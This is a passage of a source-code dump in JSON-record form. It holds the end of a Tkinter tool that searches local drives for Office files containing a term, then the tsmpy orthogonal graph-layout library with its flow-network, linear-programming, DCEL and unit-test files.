col)\r\n if myCell.value == searchInput:\r\n fileList.insert(END, full_filename)\r\n break\r\n break\r\n except:\r\n pass\r\n elif ext == \".pptx\":\r\n try:\r\n print(full_filename)\r\n prs = Presentation(full_filename)\r\n for slide in prs.slides:\r\n for shape in slide.shapes:\r\n if hasattr(shape, \"text\"):\r\n if searchInput in shape.text:\r\n fileList.insert(END, full_filename)\r\n break\r\n break\r\n except:\r\n pass\r\n\r\n except PermissionError:\r\n pass\r\n\r\n# Search User's HDD. 
Send the information of HDD and filetypes.\r\ndef searchInfo():\r\n searchInput = searchText.get()\r\n HDD_List = []\r\n\r\n for drive in win32api.GetLogicalDriveStrings().split('\\000')[:-1]:\r\n # insert the name of HDDs to the ListBox to display them for User to see.\r\n onlyHDDname = drive.split(\":\")\r\n desiredpath.delete(0, END)\r\n HDD_List.append(onlyHDDname[0])\r\n\r\n for i in HDD_List[0:]:\r\n desiredpath.insert(END, i + \" \")\r\n\r\n # Specify the file_type.\r\n print(\"Finding files\")\r\n searchDir(drive, searchInput)\r\n\r\n# Execute Search Button\r\ndef executeSearchButton():\r\n searchInfo()\r\n\r\nwindow = Tk()\r\nC = Canvas(window, bg=\"blue\", height=250)\r\nbackgroundimage = PhotoImage(file=\"image.png\")\r\nbackgroundlabel = Label(window)\r\nbackgroundlabel.pack()\r\n\r\nframe = Frame(window)\r\nframe2 = Frame(window)\r\n\r\nbOpen = tkinter.Button(window, text=\"open\")\r\nbClear = tkinter.Button(window, text=\"Clear\")\r\nbClearTwo = tkinter.Button(window, text=\"Clear\")\r\nbtnSearch = tkinter.Button(window, text=\"search\")\r\nlabelsearchtext = tkinter.Label(window, text=\"Enter text\")\r\nlabledesiredpath = tkinter.Label(window, text=\"Searched HDD\")\r\nopenedFileName = tkinter.Label(window, text=\"Opened Files\")\r\nsearchedFileName = tkinter.Label(window, text=\"Searched Files\")\r\n\r\nfileList = Listbox(frame, width=50, height=17)\r\nfileList.pack(side='left', fill='y')\r\nscrollbar = Scrollbar(frame, orient=VERTICAL)\r\nscrollbar.pack(side=\"right\", fill=\"y\")\r\nscrollbar2 = Scrollbar(frame2, orient=VERTICAL)\r\nscrollbar2.pack(side=\"right\", fill=\"y\")\r\n\r\nopenedFileList = Listbox(frame2, width=50)\r\nopenedFileList.pack(side='left', fill='y')\r\nfileList.pack(side='left', fill='y')\r\ndesiredpath = tkinter.Listbox(window, width=10, height=5)\r\nsearchText = tkinter.Entry(window, width=16)\r\n\r\n#fileList.bind('<<ListboxSelect>>', openFile)\r\n#fileList.bind('<Double-Button>', buttonOpen)\r\nopenedFileList.bind('<Double-Button>', buttonOpen)\r\n# initialise and run main loop\r\ninit(window)\r\nmainloop()\r\n\r\n"
}
] | 1 |
uknfire/tsmpy | https://github.com/uknfire/tsmpy | beac4f9cbeac45818bb86144f16c0c120700df46 | 5f306fd12ce0833279b86baa66655eeec508e03a | 7b74451ac8345e5d7d2ccb952bbd7951971df80d | refs/heads/master | 2023-06-03T05:04:12.777626 | 2021-06-19T10:21:42 | 2021-06-19T10:21:42 | 190,006,088 | 4 | 2 | null | null | null | null | null | [
{
"alpha_fraction": 0.5853658318519592,
"alphanum_fraction": 0.5943992733955383,
"avg_line_length": 33.59375,
"blob_id": "73499b23a0264a3f39f90795529a4a8a0aa41c34",
"content_id": "7da93addb54a70d1c303c32077a8fc668642e6be",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1107,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 32,
"path": "/tsmpy/tsm/planarization.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "from .utils import convert_pos_to_embedding\nfrom tsmpy.dcel import Dcel\nimport networkx as nx\n\n\nclass Planarization:\n \"\"\"Determine the topology of the drawing which is described by a planar embedding.\n \"\"\"\n\n def __init__(self, G, pos=None):\n if pos is None:\n is_planar, embedding = nx.check_planarity(G)\n pos = nx.combinatorial_embedding_to_pos(embedding)\n else:\n embedding = convert_pos_to_embedding(G, pos)\n\n self.G = G.copy()\n self.dcel = Dcel(G, embedding)\n self.dcel.ext_face = self.get_external_face(pos)\n self.dcel.ext_face.is_external = True\n\n def get_external_face(self, pos):\n corner_node = min(pos, key=lambda k: (pos[k][0], pos[k][1]))\n\n sine_vals = {}\n for node in self.G.adj[corner_node]:\n dx = pos[node][0] - pos[corner_node][0]\n dy = pos[node][1] - pos[corner_node][1]\n sine_vals[node] = dy / (dx**2 + dy**2)**0.5\n\n other_node = min(sine_vals, key=lambda node: sine_vals[node])\n return self.dcel.half_edges[corner_node, other_node].inc\n"
},
{
"alpha_fraction": 0.6248462200164795,
"alphanum_fraction": 0.6305863261222839,
"avg_line_length": 30.269229888916016,
"blob_id": "0bb680242caf3fa9059fde2869c0f254b8e31712",
"content_id": "e8df63c732c7995308d44dde031c4f07437db259",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2439,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 78,
"path": "/tsmpy/tsm/tsm.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "\"\"\"TSM means topology-shape-metrics, one approach for generating orthogonal layout.\n\"\"\"\nfrom .planarization import Planarization\nfrom .orthogonalization import Orthogonalization\nfrom .compaction import Compaction\nfrom .utils import number_of_cross\nimport networkx as nx\nfrom matplotlib import pyplot as plt\n\n__all__ = [\n \"TSM\",\n \"ortho_layout\",\n \"is_bendnode\",\n \"precheck\"\n]\n\ndef ortho_layout(G, init_pos=None, uselp=True):\n \"\"\"\n Returns\n -------\n G : Networkx graph\n which may contain bend nodes\n\n pos : dict\n A dictionary of positions keyed by node\n \"\"\"\n\n planar = Planarization(G, init_pos)\n ortho = Orthogonalization(planar, uselp)\n compa = Compaction(ortho)\n return compa.G, compa.pos\n\n\ndef is_bendnode(node):\n return type(node) is tuple and len(node) > 1 and node[0] == \"bend\"\n\n\ndef precheck(G, pos=None):\n \"\"\"Check if input is valid. If not, raise an exception\"\"\"\n if max(degree for node, degree in G.degree) > 4:\n raise Exception(\n \"Max node degree larger than 4, which is not supported currently\")\n if nx.number_of_selfloops(G) > 0:\n raise Exception(\"G contains selfloop\")\n if not nx.is_connected(G):\n raise Exception(\"G is not a connected graph\")\n\n if pos is None:\n is_planar, _ = nx.check_planarity(G)\n if not is_planar:\n raise Exception(\"G is not a planar graph\")\n else:\n if number_of_cross(G, pos) > 0:\n raise Exception(\"There are cross edges in given layout\")\n\n for node in G.nodes:\n if type(node) is tuple and len(node) > 1 and node[0] in (\"dummy\", \"bend\"):\n raise Exception(f\"Invalid node name: {node}\")\n\n\n# TODO: implement it rightly in the future\n# def postcheck(G, pos):\n# \"\"\"Check if there is cross or overlay in layout\"\"\"\n# for u, v in G.edges:\n# assert pos[u][0] == pos[v][0] or pos[u][1] == pos[v][1]\n\n\nclass TSM:\n def __init__(self, G, init_pos=None, uselp=False):\n self.G, self.pos = ortho_layout(G, init_pos, uselp)\n\n def display(self):\n \"\"\"Draw layout with networkx draw lib\"\"\"\n plt.axis('off')\n # draw edge first, otherwise edge may not be shown in result\n nx.draw_networkx_edges(self.G, self.pos)\n nx.draw_networkx_nodes(self.G, self.pos, nodelist=[node for node in self.G.nodes if not is_bendnode(\n node)], node_color='white', node_size=15, edgecolors=\"black\")\n"
},
{
"alpha_fraction": 0.5010855197906494,
"alphanum_fraction": 0.5110725164413452,
"avg_line_length": 37.38333511352539,
"blob_id": "4cbcbfee99e65c066ac1802a89b4cc0e28fa0ce1",
"content_id": "2f277327f6883d68158a3206facb7b30664d911b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2303,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 60,
"path": "/tsmpy/tsm/flownet.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "\"\"\"\n\"\"\"\nimport networkx as nx\nfrom collections import defaultdict\n\nclass Flow_net(nx.MultiDiGraph):\n def add_v2f(self, v, f, key):\n self.add_edge(v, f, key=key, lowerbound=1, capacity=4, weight=0)\n\n def add_f2f(self, f1, f2, key):\n # if not self.has_edge(f1, f2):\n self.add_edge(f1, f2, key=key, lowerbound=0, capacity=2**32, weight=1)\n\n def add_v(self, v):\n self.add_node(v, demand=-4) # the total degree around a node is 2pi\n\n def add_f(self, f, degree, is_external):\n # the degree of a face is the length of the cycle bounding the face.\n self.add_node(f, demand=(2 * degree + 4)\n if is_external else (2 * degree - 4))\n\n def min_cost_flow(self):\n def get_demand(flow_dict, node):\n in_flow = sum(flow_dict[u][v][key]\n for u, v, key in self.in_edges(node, keys=True))\n out_flow = sum(flow_dict[u][v][key]\n for u, v, key in self.out_edges(node, keys=True))\n return in_flow - out_flow\n\n def split(multi_flowG):\n base_dict = defaultdict(lambda: defaultdict(dict))\n new_mdg = nx.MultiDiGraph()\n\n for u, v, key in multi_flowG.edges:\n lowerbound = multi_flowG[u][v][key]['lowerbound']\n base_dict[u][v][key] = lowerbound\n new_mdg.add_edge(u, v, key,\n capacity=multi_flowG[u][v][key]['capacity'] -\n lowerbound,\n weight=multi_flowG[u][v][key]['weight'],\n )\n for node in multi_flowG:\n new_mdg.nodes[node]['demand'] = \\\n multi_flowG.nodes[node]['demand'] - \\\n get_demand(base_dict, node)\n return base_dict, new_mdg\n\n base_dict, new_mdg = split(self)\n flow_dict = nx.min_cost_flow(new_mdg)\n for u, v, key in self.edges:\n flow_dict[u][v][key] += base_dict[u][v][key]\n\n self.cost = self.cost_of_flow(flow_dict)\n return flow_dict\n\n def cost_of_flow(self, flow_dict):\n cost = 0\n for u, v, key in self.edges:\n cost += flow_dict[u][v][key] * self[u][v][key]['weight']\n return cost\n"
},
{
"alpha_fraction": 0.5823699235916138,
"alphanum_fraction": 0.5823699235916138,
"avg_line_length": 26.68000030517578,
"blob_id": "265cc78cc93b4dd12c35d5977f9b6807f423e6a3",
"content_id": "66ee0f326fca64138fc604cd2e9162d453716f42",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 692,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 25,
"path": "/tsmpy/dcel/face.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "class Face:\n def __init__(self, name):\n self.id = name\n self.inc = None # the first half-edge incident to the face from left\n self.is_external = False\n\n def __len__(self):\n return len(list(self.surround_vertices()))\n\n def __repr__(self) -> str:\n return str(self.id)\n\n def surround_faces(self): # clockwise, duplicated!!\n for he in self.surround_half_edges():\n yield he.twin.inc\n\n def surround_half_edges(self): # clockwise\n yield from self.inc.traverse()\n\n def surround_vertices(self):\n for he in self.surround_half_edges():\n yield he.ori\n\n def __hash__(self):\n return hash(self.id)\n"
},
{
"alpha_fraction": 0.5136138796806335,
"alphanum_fraction": 0.5254950523376465,
"avg_line_length": 33.23728942871094,
"blob_id": "8e6ec1bc560f36f7ce554076778088b7b1f77758",
"content_id": "29f234688f58046b73522b0090955d04131b429d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4040,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 118,
"path": "/tsmpy/tsm/utils.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "from networkx import PlanarEmbedding\nfrom math import atan2\nimport networkx as nx\nimport matplotlib.patches as mpatches\nfrom matplotlib import pyplot as plt\n\n\ndef convert_pos_to_embedding(G, pos):\n \"\"\"Make sure only straight line in layout\"\"\"\n emd = PlanarEmbedding()\n for node in G:\n neigh_pos = {\n neigh: (pos[neigh][0]-pos[node][0], pos[neigh][1]-pos[node][1]) for neigh in G[node]\n }\n neighes_sorted = sorted(G.adj[node],\n key=lambda v: atan2(\n neigh_pos[v][1], neigh_pos[v][0])\n ) # counter clockwise\n last = None\n for neigh in neighes_sorted:\n emd.add_half_edge_ccw(node, neigh, last)\n last = neigh\n emd.check_structure()\n return emd\n\n\ndef number_of_cross(G, pos):\n \"\"\"\n not accurate, may be equal to actual number or double\n \"\"\"\n def is_cross(pa, pb, pc, pd):\n def xmul(v1, v2):\n return v1[0] * v2[1] - v1[1] * v2[0]\n\n def f(pa, pb, p):\n return (pa[1] - pb[1]) * (p[0] - pb[0]) - (p[1] - pb[1]) * (pa[0] - pb[0])\n\n ca = (pa[0] - pc[0], pa[1] - pc[1])\n cb = (pb[0] - pc[0], pb[1] - pc[1])\n cd = (pd[0] - pc[0], pd[1] - pc[1])\n return xmul(ca, cd) >= 0 and xmul(cd, cb) >= 0 and f(pa, pb, pc) * f(pa, pb, pd) < 0\n\n count = 0\n for a, b in G.edges:\n for c, d in G.edges:\n if a not in (c, d) and b not in (c, d):\n if is_cross(pos[a], pos[b], pos[c], pos[d]):\n count += 1\n\n return count\n\n\ndef overlap_nodes(G, pos): # not efficient\n inv_pos = {}\n for k, v in pos.items():\n v = tuple(v) # compatible with pos given by nx.spring_layout()\n inv_pos[v] = inv_pos.get(v, ()) + (k,)\n return [node for nodes in inv_pos.values() if len(nodes) > 1 for node in nodes]\n\n\ndef overlay_edges(G, pos): # not efficient\n res = set()\n for a, b in G.edges:\n (xa, ya), (xb, yb) = pos[a], pos[b]\n for c, d in G.edges:\n (xc, yc), (xd, yd) = pos[c], pos[d]\n if (a, b) != (c, d):\n if xa == xb == xc == xd:\n if min(ya, yb) >= max(yc, yd) or max(ya, yb) <= min(yc, yd):\n continue\n res.add((a, b))\n res.add((c, d))\n if ya == yb == yc == yd:\n if min(xa, xb) >= max(xc, xd) or max(xa, xb) <= min(xc, xd):\n continue\n res.add((a, b))\n res.add((c, d))\n return list(res)\n\n\ndef draw_overlay(G, pos, is_bendnode):\n \"\"\"Draw graph and highlight bendnodes, overlay nodes and edges\"\"\"\n plt.axis('off')\n # draw edge first, otherwise edge may not show in plt result\n # draw all edges\n nx.draw_networkx_edges(G, pos)\n # draw all nodes\n nx.draw_networkx_nodes(G, pos, nodelist=[node for node in G.nodes if not is_bendnode(\n node)], node_color='white', node_side=15)\n\n draw_nodes_kwds = {'G': G, 'pos': pos, 'node_size': 15}\n\n bend_nodelist = [node for node in G.nodes if is_bendnode(node)]\n # draw bend nodes if exist\n if bend_nodelist:\n nx.draw_networkx_nodes(\n nodelist=bend_nodelist, node_color='grey', **draw_nodes_kwds)\n\n # draw overlap nodes if exist\n overlap_nodelist = overlap_nodes(G, pos)\n if overlap_nodelist:\n nx.draw_networkx_nodes(\n nodelist=overlap_nodelist, node_color=\"red\", **draw_nodes_kwds)\n\n # draw overlay edges if exist\n overlay_edgelist = overlay_edges(G, pos)\n if overlay_edgelist:\n nx.draw_networkx_edges(\n G, pos, edgelist=overlay_edgelist, edge_color='red')\n\n # draw patches if exist\n patches = []\n if overlap_nodelist or overlay_edgelist:\n patches.append(mpatches.Patch(color='red', label='overlay'))\n if bend_nodelist:\n patches.append(mpatches.Patch(color='grey', label='bend node'))\n if patches:\n plt.legend(handles=patches)\n"
},
{
"alpha_fraction": 0.6078697443008423,
"alphanum_fraction": 0.614654004573822,
"avg_line_length": 24.413793563842773,
"blob_id": "4dd3a68ee5fe0c0cb9d778169e95168f5b375753",
"content_id": "7bea475fa04d905ea48a24375c1b355a4c5d3b13",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 737,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 29,
"path": "/setup.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "from setuptools import setup, find_packages\nimport pathlib\n\nHERE = pathlib.Path(__file__).parent\nREADME = (HERE / \"README.md\").read_text()\n\nsetup(\n name=\"tsmpy\",\n version=\"0.9.3\",\n author=\"uknfire\",\n author_email=\"[email protected]\",\n description=\"An orthogonal layout algorithm, using TSM approach\",\n long_description=README,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/uknfire/tsmpy\",\n project_urls={\n \"Source\": \"https://github.com/uknfire/tsmpy\",\n },\n license=\"MIT\",\n packages=find_packages(),\n keywords=[\n \"Graph Drawing\",\n \"orthogonal\",\n \"layout\",\n \"graph\",\n ],\n install_requires=[\"networkx\", \"pulp\"],\n python_requires=\">=3.6\",\n)\n"
},
{
"alpha_fraction": 0.5140562057495117,
"alphanum_fraction": 0.5140562057495117,
"avg_line_length": 23.09677505493164,
"blob_id": "1ecd9fadb9d49ed1543138c447d0e2b48ac9bfa1",
"content_id": "12543e9bd5e1ef445b2431ca1b0f6f7383f51393",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 747,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 31,
"path": "/tsmpy/dcel/halfedge.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "class HalfEdge:\n def __init__(self, name):\n self.id = name\n self.inc = None # the incident face at its right hand\n self.twin = None\n self.ori = None\n self.prev = None\n self.succ = None\n\n def get_points(self):\n return self.ori.id, self.twin.ori.id\n\n def set(self, twin, ori, prev, succ, inc):\n self.twin = twin\n self.ori = ori\n self.prev = prev\n self.succ = succ\n self.inc = inc\n\n def traverse(self):\n yield self\n he = self.succ\n while he is not self:\n yield he\n he = he.succ\n\n def __repr__(self) -> str:\n return f'{self.ori}->{self.twin.ori}'\n\n def __hash__(self):\n return hash(self.id)\n"
},
{
"alpha_fraction": 0.5173543095588684,
"alphanum_fraction": 0.5221567153930664,
"avg_line_length": 37.49580001831055,
"blob_id": "60aed33c13fbb3129196abe27094d4bd6902ce72",
"content_id": "7c645a21ed3a6d4ea132ecd870cb2ec38123c128",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4581,
"license_type": "permissive",
"max_line_length": 101,
"num_lines": 119,
"path": "/tsmpy/tsm/orthogonalization.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "import pulp\nfrom collections import defaultdict\nfrom .flownet import Flow_net\n\nclass Orthogonalization:\n '''works on a planar embedding, changes shape of the graph.\n '''\n\n def __init__(self, planar, uselp=False):\n self.planar = planar\n\n self.flow_network = self.face_determination()\n if not uselp:\n self.flow_dict = self.tamassia_orthogonalization()\n else:\n self.flow_dict = self.lp_solve()\n\n def face_determination(self):\n flow_network = Flow_net()\n\n for vertex in self.planar.dcel.vertices.values():\n flow_network.add_v(vertex.id)\n\n for face in self.planar.dcel.faces.values():\n flow_network.add_f(face.id, len(\n face), face.is_external)\n\n for vertex in self.planar.dcel.vertices.values():\n for he in vertex.surround_half_edges():\n flow_network.add_v2f(vertex.id, he.inc.id, he.id)\n\n for he in self.planar.dcel.half_edges.values():\n flow_network.add_f2f(he.twin.inc.id, he.inc.id, he.id) # lf -> rf\n\n return flow_network\n\n def tamassia_orthogonalization(self):\n return self.flow_network.min_cost_flow()\n\n def lp_solve(self, weight_of_corner=1):\n '''\n Use linear programming to solve min cost flow problem, make it possible to define constrains.\n\n Alert: pulp will automatically transfer node's name into str and repalce some special\n chars into '_', and will throw a error if there are variables' name duplicated.\n '''\n\n\n prob = pulp.LpProblem() # minimize\n\n var_dict = {}\n varname2tuple = {}\n for u, v, he_id in self.flow_network.edges:\n var_dict[u, v, he_id] = pulp.LpVariable(\n f'{u}{v}{he_id}',\n self.flow_network[u][v][he_id]['lowerbound'],\n self.flow_network[u][v][he_id]['capacity'],\n pulp.LpInteger\n )\n # pulp will replace ' ' with '_' automatically\n varname2tuple[f'{u}{v}{he_id}'.replace(' ', \"_\")] = (u, v, he_id)\n\n objs = []\n for he in self.planar.dcel.half_edges.values():\n lf, rf = he.twin.inc.id, he.inc.id\n objs.append(\n self.flow_network[lf][rf][he.id]['weight'] *\n var_dict[lf, rf, he.id]\n )\n\n # bend points' cost\n if weight_of_corner != 0:\n for v in self.planar.G:\n if self.planar.G.degree(v) == 2:\n (f1, he1_id), (f2, he2_id) = [(f, key)\n for f, keys in self.flow_network.adj[v].items()\n for key in keys]\n x = var_dict[v, f1, he1_id]\n y = var_dict[v, f2, he2_id]\n p = pulp.LpVariable(\n x.name + \"temp\", None, None, pulp.LpInteger)\n prob.addConstraint(x - y <= p)\n prob.addConstraint(y - x <= p)\n objs.append(weight_of_corner * p)\n\n prob += pulp.lpSum(objs) # number of bends in graph\n\n for f in self.planar.dcel.faces:\n prob += self.flow_network.nodes[f]['demand'] == pulp.lpSum(\n [var_dict[v, f, he_id] for v, _, he_id in self.flow_network.in_edges(f, keys=True)])\n for v in self.planar.G:\n prob += -self.flow_network.nodes[v]['demand'] == pulp.lpSum(\n [var_dict[v, f, he_id] for _, f, he_id in\n self.flow_network.out_edges(v, keys=True)]\n )\n\n state = prob.solve()\n res = defaultdict(lambda: defaultdict(dict))\n if state == 1: # update flow_dict\n self.flow_network.cost = pulp.value(prob.objective)\n for var in prob.variables():\n if var.name in varname2tuple:\n u, v, he_id = varname2tuple[var.name]\n res[u][v][he_id] = int(var.varValue)\n else:\n raise Exception(\"Problem can't be solved by linear programming\")\n return res\n\n\n # Only for validation\n def number_of_corners(self):\n count_right_angle = 0\n for node in self.planar.G:\n if self.planar.G.degree(node) == 2:\n for f, he_id in [(f, key) for f, keys in self.flow_network.adj[node].items()\n for key in keys]:\n if self.flow_dict[node][f][he_id] == 
1:\n count_right_angle += 1\n return count_right_angle + self.flow_network.cost\n"
},
{
"alpha_fraction": 0.37617066502571106,
"alphanum_fraction": 0.5591397881507874,
"avg_line_length": 42.35384750366211,
"blob_id": "af9bf9952f36293869b75b5bba344ad894aa914e",
"content_id": "849c6b7da7127754bbbc2712dedac7c8bf155802",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5770,
"license_type": "permissive",
"max_line_length": 591,
"num_lines": 130,
"path": "/test.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "import networkx as nx\r\nfrom tsmpy import TSM\r\nfrom matplotlib import pyplot as plt\r\nimport unittest\r\n\r\n\r\nclass TestRefine(unittest.TestCase):\r\n def test_convex(self): # 凸\r\n e = [(i, i + 1) for i in range(7)] + [(7, 0)]\r\n G = nx.Graph(e)\r\n pos = {0: (0, 0), 1: (0, 1), 2: (1, 1), 3: (1, 2),\r\n 4: (2, 2), 5: (2, 1), 6: (3, 1), 7: (3, 0)}\r\n\r\n tsm = TSM(G, pos)\r\n tsm.display()\r\n plt.savefig(\"test/outputs/convex.svg\")\r\n plt.close()\r\n\r\n def test_cross(self): # 十\r\n e = [(i, i + 1) for i in range(11)] + [(11, 0)]\r\n G = nx.Graph(e)\r\n pos = {0: (0, 0), 1: (0, 1), 2: (1, 1), 3: (1, 2),\r\n 4: (2, 2), 5: (2, 1), 6: (3, 1), 7: (3, 0),\r\n 8: (2, 0), 9: (2, -1), 10: (1, -1), 11: (1, 0),\r\n }\r\n tsm = TSM(G, pos)\r\n tsm.display()\r\n plt.savefig(\"test/outputs/cross.svg\")\r\n plt.close()\r\n\r\nclass TestGML(unittest.TestCase):\r\n @staticmethod\r\n def _test(filename, uselp):\r\n G = nx.Graph(nx.read_gml(filename))\r\n pos = {node: eval(node) for node in G}\r\n\r\n # shortify node name\r\n node_dict = {v: i for i, v in enumerate(pos)}\r\n G = nx.Graph([node_dict[u], node_dict[v]] for u, v in G.edges)\r\n pos = {node_dict[k]: v for k, v in pos.items()}\r\n\r\n tsm = TSM(G, pos, uselp=uselp)\r\n tsm.display()\r\n plt.savefig(filename.replace(\r\n \"inputs\", \"outputs\").replace(\".gml\", f\".{'lp' if uselp else 'nolp'}.svg\"))\r\n plt.close()\r\n\r\n\r\n def test_4_nocut(self): # no cut edge\r\n TestGML._test(\"test/inputs/case4.gml\", False)\r\n TestGML._test(\"test/inputs/case4.gml\", True)\r\n\r\n def test_2_nocut(self): # no cut edge\r\n TestGML._test(\"test/inputs/case2.gml\", False)\r\n TestGML._test(\"test/inputs/case2.gml\", True)\r\n\r\n def test_5_2cut_external(self): # a small graph, has two external cut-edges\r\n TestGML._test(\"test/inputs/case5.gml\", False)\r\n TestGML._test(\"test/inputs/case5.gml\", True)\r\n\r\n def test_7_1cut_internal(self): # a small graph, has one internal cut-edge\r\n TestGML._test(\"test/inputs/case7.gml\", False)\r\n TestGML._test(\"test/inputs/case7.gml\", True)\r\n\r\n def test_8_cut_external(self): # external face has cut-edges, simpler that case1\r\n TestGML._test(\"test/inputs/case8.gml\", False)\r\n TestGML._test(\"test/inputs/case8.gml\", True)\r\n\r\n def test_1_cut_external(self): # external face has cut-edges\r\n TestGML._test(\"test/inputs/case1.gml\", False)\r\n TestGML._test(\"test/inputs/case1.gml\", True)\r\n\r\n def test_6_cut_internal(self): # internal face has cut-edges\r\n TestGML._test(\"test/inputs/case6.gml\", False)\r\n TestGML._test(\"test/inputs/case6.gml\", True)\r\n\r\n def test_3_cut_both(self): # inner face has cut-edges (most difficult\r\n TestGML._test(\"test/inputs/case3.gml\", False)\r\n TestGML._test(\"test/inputs/case3.gml\", True)\r\n\r\n\r\nclass TestBend(unittest.TestCase):\r\n def test_bend(self):\r\n pos = {'0': [233.40717895650255, 245.2668161593756], '1': [197.16129504244714, 30], '2': [141.70696162531476, 231.32493034071877], '3': [60.65624829590422, 113.49167630171439], '4': [108.35736160598731, 76.64552177189921], '5': [87.0130296182083, 188.10311014236993], '6': [319.33416955603843, 259.2393822803765], '7': [30, 277.38385767958584], '8': [98.92200205792096, 284.1742280192017], '9': [179.4743438581056, 319.91589873409737], '10': [287.1444006787124, 72.41331541473198], '11': [31.12464635584422, 32.898914774980994], '12': [158.93331495445887, 99.4944443930458], '13': [\r\n 139.43918552954983, 153.80882320636442], '14': [369.5136536406337, 104.14142146557003], '15': 
[290.598502710234, 165.863033803461], '16': [211.4553136831521, 174.1784364618411], '17': [228.30221376063673, 102.81798218614415], '18': [37.389296631515435, 206.8668863010132], '19': [387.48004971189835, 189.04480920874767], 'cdnode1': [70.62903289986328, 215.04295834065474], 'cdnode2': [91.39401162703457, 219.91146037454223], 'cdnode3': [98.17352514597789, 132.9352577570292], 'cdnode4': [120.30579006619145, 105.56723017608186], 'cdnode5': [102.94092788747736, 108.040441996923]}\r\n\r\n\r\n edges = [['0', '2'], ['0', '6'], ['0', '15'], ['0', '9'], ['1', '4'], ['1', '17'], ['1', '10'], ['2', '16'], ['2', '13'], ['3', '5'], ['3', '11'], ['4', '11'], ['6', '19'], ['7', '18'], ['8', '9'], ['10', '15'], ['10', '14'], ['12', '16'], ['14', '19'], ['15', '17'], ['cdnode1', '18'], [\r\n '5', 'cdnode1'], ['cdnode1', '7'], ['2', 'cdnode2'], ['cdnode2', 'cdnode1'], ['5', 'cdnode2'], ['cdnode2', '8'], ['3', 'cdnode3'], ['cdnode3', '13'], ['cdnode3', '5'], ['cdnode4', '12'], ['4', 'cdnode4'], ['cdnode4', '13'], ['3', 'cdnode5'], ['cdnode5', 'cdnode4'], ['4', 'cdnode5'], ['cdnode5', 'cdnode3']]\r\n\r\n G = nx.Graph(edges)\r\n tsm = TSM(G, pos)\r\n tsm.display()\r\n plt.savefig(f\"test/outputs/bend.svg\")\r\n plt.close()\r\n\r\nclass TestGrid(unittest.TestCase):\r\n def _test_grid(i, j):\r\n G = nx.grid_2d_graph(i, j)\r\n pos = {node: node for node in G}\r\n tsm = TSM(G, pos)\r\n tsm.display()\r\n plt.savefig(f\"test/outputs/grid_{i}x{j}.svg\")\r\n plt.close()\r\n\r\n def test_2x1(self):\r\n TestGrid._test_grid(2, 1)\r\n\r\n def test_1x5(self):\r\n TestGrid._test_grid(1, 5)\r\n\r\n def test_1x2(self):\r\n TestGrid._test_grid(1, 2)\r\n\r\n def test_5x5(self):\r\n TestGrid._test_grid(5, 5)\r\n\r\n def test_3x3(self):\r\n TestGrid._test_grid(3, 3)\r\n\r\n def test_2x2(self):\r\n TestGrid._test_grid(2, 2)\r\n\r\n def test_1x99(self):\r\n TestGrid._test_grid(1, 99)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main(verbosity=3, exit=False)\r\n"
},
{
"alpha_fraction": 0.782608687877655,
"alphanum_fraction": 0.782608687877655,
"avg_line_length": 22,
"blob_id": "f3d52cf2cbc66e1e33807021f646b7f9be0f01c6",
"content_id": "54f20bd03a023c684924a40c000e7c92191b4b88",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 23,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 1,
"path": "/tsmpy/dcel/__init__.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "from .dcel import Dcel\n"
},
{
"alpha_fraction": 0.4835532009601593,
"alphanum_fraction": 0.4937554895877838,
"avg_line_length": 33.75471878051758,
"blob_id": "e9112202e60bf578856d0f799846568f6b6420bc",
"content_id": "6249ea3ddfaf212daf912cdd370a36dc1fd41dfe",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5685,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 159,
"path": "/tsmpy/dcel/dcel.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
